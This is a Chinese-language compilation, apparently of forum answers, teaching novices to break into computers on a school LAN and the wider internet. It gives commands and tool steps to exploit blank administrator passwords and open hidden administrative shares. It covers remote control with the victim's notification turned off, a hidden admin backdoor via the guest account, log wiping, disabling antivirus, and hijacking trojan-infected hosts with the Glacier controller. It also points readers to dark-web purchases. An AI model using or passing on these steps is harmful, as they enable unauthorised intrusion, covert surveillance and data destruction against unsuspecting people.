首先申明：

　　1.入侵的范围只包括局域网，如果在学校上，可以入侵整个校园网； 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空)，并且开了139端口，但没开防火墙的机子。 入侵工具： 一般要用到三个：NTscan变态扫描器，Recton--D贺免杀专用版，DameWare迷你中文版 4.5. （前两个工具杀毒软件都会报毒，建议将杀毒软件实时防毒暂时关掉，并将这两个软件的压缩包加密，防止被杀。） 入侵步骤： 1.使用"NTscan变态扫描器"，在IP处填上要扫描的IP范围，选择"WMI扫描"方式，按"开始"后就等扫描结果了。

　　2.使用"Recton--D贺免杀专用版" 选择"CMD命令"项，在"CMD:"中输入"net share C$=C:"，即可开启远程主机的C盘共享，以此将"C"换成D,E,F等，即可开启D盘，E盘，F盘等的共享，这种共享方式隐蔽性很高，而且是完全共享，在对方主机上不会出现一只手托住盘的共享标志，然后在地址栏中输入"对方IPC$"，即可进入对方C盘。 选择"Telnet"项，在"远程主机"中输入刚才扫描到的一个IP，远程启动Telnet服务，成功后在"CMD选项"中，执行命令："net share ipc$",接着执行："net share admin$",最后执行"net use ***.***.***.***IPC$ "" /user：administrator"在*处填入你入侵的主机IP。

　　3.使用"DameWare迷你中文版 4.5"，安装后点"DameWare Mini Remote Control"，在"帮助"项中选择激活产品，输入注册信息，成功注册后，进入"远程连接"窗口，在"主机"处填入IP地址，点"设置"，在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选，在"用户选项"中去掉"启用用户选项菜单"。设置完成好后，就可点"连接"，在弹出的对话框中点"确定"后，成功后你就可以像操作自己机子一样控制别人电脑了，当然你也可以只选择监视对方屏幕。 注意：如果不注册的话，在对方主机上会弹出一个对话框，暴露你的身份。

　　入侵步骤补充： 1.在以上第2步中，远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。

　　2.Recton--D贺免杀专用版还有其他功能，在"进程"项中，可以查看远程主机的进程，并可任意结束其中进程；在"共享"项中，可以创建共享，我常用的是创建C$,D$,E$,F$,共享路径分别对应C：,D：等，共享好后在地址栏中输入"IPC$",进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后更好还是把共享给关掉。最后选"日志"，清除所有日志，不留痕迹。这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。

　　3.上面的共享可通过CMD(程序-附件-命令提示符)完成，首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后，开共享用net share命令，共享C$(即C盘)："net share C$=C：",共享system文件夹："net share c=c：winntsystem32",共享IPC$用："net share IPC$"等,最后是关闭共享，关闭C盘共享："net share C$ /del"。

　　4.为方便下次入侵，可以设置后门， 查看用户："net user",激活guest用户 "net user guest /active：yes",更改guest的密码为poco："net user guest poco",把guest的权限提升为管理员权限："net localgroup administrators guest /add"。 5.telnet命令(DOS命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：""dir d：",查看C盘program file文件夹："dir c：PROGRA~1;",60秒倒记时关机："shutdown -s -t 60"

　　我们学校信息教室的机子们都在一个局域网，ip的格式都是192.168.0.X（X为机子号）

　　ping每一个机子都能ping得通

　　那么那位高人能教教我在这个局域网中侵略他人计算机或是搞些恶作剧的 ***

　　（步骤要明了，不要太复杂，不能使用人家编好的第三方软件）

　　原发布者:前面的路luot

　　入侵局域网电脑的 *** *** 一：1.取得对方IP地址如XX.XX.XX.XX， *** 太多不细讲了。2.判断对方上网的地点，开个DOS窗口键入TRACERTXX.XX.XX.XX第4行和第5行反映的信息既是对方的上网地点。3.得到对方电脑的名称，开个DOS窗口键入N *** STAT-AXX.XX.XX.XX之一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件：XX.XX.XX.XX电脑名5.开DOS窗口键入N *** STAT-R6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。 *** 二：之一步下载必备的工具软件。1号软件就是端口扫描工具“ *** 刺客II”，2号软件就是著名的国产木马冰河2.2的控制端。下载完毕并解压缩之后跟我进行第二步!第二步运行1号软件，首先出现的是“ *** 刺客II注册向导”，别理它点击“稍后(Q)”就进入了 *** 刺客II的主界面。第三步在 *** 刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”，就进入了“搜索因特网主机”界面。第四步进入“搜索因特网主机”界面后，“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了，比如你可以选61.128或选61.200等等，“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626，其他栏保持默认不动。好了，以上设置就是要搜索

　　事先 声明，本人不是黑客，不懂高深的计算机知识。

　　三步骤：

　　一、到要入侵的电脑上(假设IP：192.168.0.100)，右击我的电脑--远程--允许用户远程连接到此计算机打勾。如果不懂得超级管理员权限，就去新建个帐户。

　　二、在你自己的电脑上，打开cmd ，输入:mstsc，跳出远程桌面，输入192.168.0.100。进入之后，要求输入正确的用户名密码，你就把刚刚建的帐户输入，或者你本来就已经知道超级管理员的权限，也可以输入。

　　三、进去之后，你可以写上某某到此一游。或者直接点开始--关机。于是......

　　请采纳

　　.........这个不教,有兴趣请到黑客基地之类的网站学习. ipc$共享,进入对方磁盘分区目录. 放木马,at命令开启计划任务启动该木马程序,远程链入 或通过修改远程注册表,开启3389共享 直接用远程桌面登陆. 这些是比较简单的, 不过入侵思路差不多. 监听,扫描->窃取有用信息(密码)->利用有漏洞的端口->链入->放后门->.........随便你干什么了.

　　知道 *** IP和物理IP，以及他们的用户名

　　教你一个CMD入侵 IPC$入侵

　　利用ipc$入侵的相关命令：

　　我们在入侵的时候难免遇到忘记命令的时候，现在将我所知道的一些命令总结出来提供给各位。通过这些命令可以解决很大一部分新手的问题。

　　00:net use

　　作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

　　命令格式：

　　net use [devicename | *] [\computernamesharename[volume]] [password | *]] [/user:[domainname]username] [[/delete] | [/persistent:{yes | no}]]

　　参数介绍：

　　(1)键入不带参数的net use列出 *** 连接。

　　(2)devicename指定要连接到的资源名称或要断开的设备名称。

　　(3)\computernamesharename服务器及共享资源的名称。

　　(4)password访问共享资源的密码。

　　(5)*提示键入密码。

　　(6)/user指定进行连接的另外一个用户。

　　(7)domainname指定另一个域。

　　(8)username指定登录的用户名。

　　(9)/home将用户连接到其宿主目录。

　　(10)/delete取消指定 *** 连接。

　　(11)/persistent控制永久 *** 连接的使用。

　　01: net use \X.X.X.Xipc$ "" /user:"" 建立空连接

　　02: net use \X.X.X.Xipc$ "密码" /user:"用户名" 建立非空连接

　　03: net use \X.X.X.Xipc$ /del 删除连接

　　04: net time \X.X.X.X

　　作用：使计算机的时钟与另一台计算机或域的时间同步。

　　命令格式：net time [\computername | /domain[:name]] [/set]

　　参数介绍：

　　(1)\computername要检查或同步的服务器名。

　　(2)/domain[:name]指定要与其时间同步的域。

　　(3)/set使本计算机时钟与指定计算机或域的时钟同步。

　　05: net view \X.X.X.X

　　作用：显示域列表、计算机列表或指定计算机的共享资源列表。

　　命令格式：net view [\computername | /domain[:domainname]]

　　参数介绍：

　　(1)键入不带参数的net view显示当前域的计算机列表。

　　(2)\computername 指定要查看其共享资源的计算机。

　　(3)/domain[:domainname]指定要查看其可用计算机的域。

　　06: net use X: \X.X.X.XY 将共享名为Y的共享资源映射为本地X盘

　　07: net use X: /del 删除映射的X盘

　　08: net share

　　作用：创建、删除或显示共享资源。

　　命令格式：net share share name=drive:path [/users:number | /unlimited] [/remark:"text"]

　　参数介绍：(1)键入不带参数的net share显示本地计算机上所有共享资源的信息。 　 (2)sharename是共享资源的 *** 名称。

　　(3)drive:path指定共享目录的绝对路径。

　　(4)/users:number设置可同时访问共享资源的更大用户数。

　　(5)/unlimited不限制同时访问共享资源的用户数。

　　(6)/remark:"text "添加关于资源的注释，注释文字用引号引住。

　　09: net user

　　作用：添加或更改用户帐号或显示用户帐号信息。

　　该命令也可以写为 net users

　　命令格式：net user [username [password | *] [options]] [/domain]

　　参数介绍：(1)键入不带参数的net user查看计算机上的用户帐号列表。

　　(2)username添加、删除、更改或查看用户帐号名。

　　(3)password为用户帐号分配或更改密码。

　　(4)*提示输入密码。

　　(5)/domain在计算机主域的主域控制器中执行操作。

　　10: net start 作用：启动服务，或显示已启动服务的列表。

　　11: net pause 作用：暂停正在运行的服务。

　　12: net Continue 作用：重新激活挂起的服务。

　　13: net stop

　　还可以利用工具，如ATOOL，流光。。。

　　可以和我交流哦

　　1。开共享 2.用宽带线连接电脑 3.最重要的！将一台计算机的ip地址和路由器管理地址设置在同一网段，例如192.168.0.2，打开192.168.0.2计算机的浏览器，在地址栏输入“http：//192.168.0.1:8080”后按回车键即出现用户登陆提示窗口，输入宽带路由器说明书中的默认管理账户和密码进入设置界面。

　　为了让路由器能够自动拨号，我们还需要将ADSL账号集成到路由器中。

　　点击上方的“首页”标签，然后点击作变的“WAN”，在PPP over Ethernet处看到设置ADSL账号的地方，输入自己申请的ADSL账号和密码后保存设置。

　　现在到“系统状态”标签中的“系统信息”处察看联网状态，在WAN端可以清晰地看到ADSL拨号获得的 *** 信息。

　　设置完ADSL账号后，我们就可以通过宽带路由器上网了，不过为了更好的管理和提高安全性还需要进行如下操作：点击“首页”标签，然后在左边选择“DHCP”，在DHCP服务器可进入的ip范围处设置ip地址范围，保存后宽带路由器就具备自动分配ip地址的功能了。

　　！！！ 请给分哦

　　使用嗅探 具体的用百度搜索 很容易的一些小软件就作到了

　　看了就算你是新手也会入侵电脑了（如果觉得复杂直接拉倒我的文字底部采用你需要的方案）

　　本文主要讲述用木马攻击别人电脑，国产木马冰河2.2很不错的软件，看完本文后你可以准备一下软件，来试试。呵呵

　　别做违法的事情哦。本文的主要目的是让大家了解木马的攻击过程，熟悉了，就好防范了。

　　开始了。。。

　　步骤如下：

　　首先的之一步是：

　　所谓磨刀不误砍柴工嘛。。。

　　下载必备的工具软件。1号软件就是端口扫描工具“ *** 刺客II”，2号软件就是著名的国产木马冰河2.2的控制端。

　　下载完毕并解压缩之后跟我进行第二步!

　　第二步

　　运行1号软件，首先出现的是“ *** 刺客II注册向导”，别理它，点击“稍后(Q)”就进入了 *** 刺客II的主界面。

　　第三步

　　在 *** 刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”，就进入了“搜索因特网主机”界面。

　　第四步

　　进入“搜索因特网主机”界面后，“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了，比如你可以选61.128或选61.200 等等，“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626，其他栏保持默认不动。

　　好了，以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了，再检查一下填对没有?如果一切OK，请点击“开始搜索”。

　　第五步

　　观察“总进度”和“段进度”是否在走动。如果没有走动，那一定是IP地址设置不对，请认真检查。如果两个进度都在走动，呵呵，你就成功一半了，至少你会使用 *** 刺客II扫描网上开放某一端口的计算机了。

　　下面你要作的就是静静的等待，学用黑客软件是需要耐心的。大约20-30分钟后，最下面的记录栏里就应该出现记录了(一般情况下，应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机，前面是该计算机的IP地址，后面是7626(冰河木马端口)。

　　第六步

　　点击“停止搜索”，但不要退出程序，到第十二步时还要用。运行2号软件冰河，进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。

　　第七步

　　在“添加主机”窗口，“显示名称”里填入第五步里搜索到的之一条IP地址，当IP地址填入“显示名称”里后，“主机地址”里就自动填入相同的IP了。“访问口令”不填，“监听端口”保持默认的7626。

　　好了，检查一下IP有没有填错，如果OK，点击“确定”，在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。

　　第八步

　　这一步和下一步最重要，请认真看清楚!在冰河的主界面里，点击“文件管理器”里的“我的电脑”，这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如，如果你的硬盘分的是四个区，“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:，如果你的硬盘分的是两个区，就会出现C:、 D:。

　　第九步

　　点击“文件管理器”里刚才输入的之一条IP地址，稍等片刻(网速慢的情况下约10-30秒)，在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵，祝贺你，你已经成功地进入对方的计算机了!!!!!

　　第十步

　　你发现没有出现对方计算机的硬盘分区!!呵呵，别急，看看冰河主界面最下端的状态栏里有什么提示，如果是下面两种情况，就放弃，返回第七步，填入搜索到的第二条IP地址:

　　1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示，表示该计算机的冰河木马是加了密码的，没有办法，只得放弃!

　　2、状态栏里出现“正在解释命令，可能是1.2以前版本”等之类的提示，也放弃，新手是搞不定的，如果以后你熟练了可以给对方升级，这是后话!!

　　第十一步

　　如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示，先别忙放弃，重复3-4遍第八步到第九步的操作，即点击“我的电脑”-》点击输入的IP地址，如此反复3-4遍后，还是不行的话再放弃，返回第七步，填入搜索到的下一条IP地址。

　　第十二步

　　如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机，呵呵，那是你的运气太差!别急，这样的运气是经常碰到的!再返回第五步，在“搜索因特网主机”界面里点击“开始搜索”，这时该程序又从你停止的IP地址接着往下搜索了!!呵呵，等吧!!搜索吧!!只要你有时间，你一定能成功!

　　第十三步

　　终于成功了!我见到对方计算机硬盘分区了!呵呵，怎么样?你成功了，我的任务就完成了。进入对方计算机后，所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了!

　　这道快餐是专门为从来没有通过 *** 进入过对方计算机的 *** 新手们准备的，主要使用的软件就是著名的国产木马冰河2.2，所以，如果你已经使用过冰河2.2，就不必跟着我们往下走了。其他有兴趣的 *** 新手们，嘿嘿，开始吧，开始你的木马旅程。。。如果还是不会就采用更加便捷的软件把 直接进（暗 *** 买就可以了 不过不知道你会不会用洋葱浏览器了 这是进暗网必须采用的浏览器！如果这个都不会进 直接点头像找我 *** ）